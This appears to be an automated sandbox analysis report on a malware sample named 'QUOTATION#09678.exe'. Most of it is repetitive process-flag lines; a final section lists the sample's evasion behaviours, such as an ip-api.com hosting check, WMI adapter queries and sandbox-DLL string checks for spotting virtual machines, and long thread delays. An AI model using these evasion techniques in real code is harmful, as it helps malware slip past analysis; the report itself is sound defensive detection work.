                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Check if machine is in data center or colocation facility
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: QUOTATION#09678.exe, 00000000.00000002.1895673807.000001F3D03FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                  Source: QUOTATION#09678.exe, 00000000.00000002.1895673807.000001F3D03FA000.00000004.00000800.00020000.00000000.sdmp, QUOTATION#09678.exe, 00000000.00000002.1896304643.000001F3E0037000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000004.00000002.4168843900.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeMemory allocated: 1F3CE5A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeMemory allocated: 1F3E8030000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 1250000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 2D50000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 1250000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeCode function: 0_2_00007FFD9B88E395 rdtsc 0_2_00007FFD9B88E395
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599766Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599641Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599531Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599421Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599303Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599141Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598645Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598500Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598391Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598277Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598156Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598047Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597937Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597827Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597719Jump to behavior
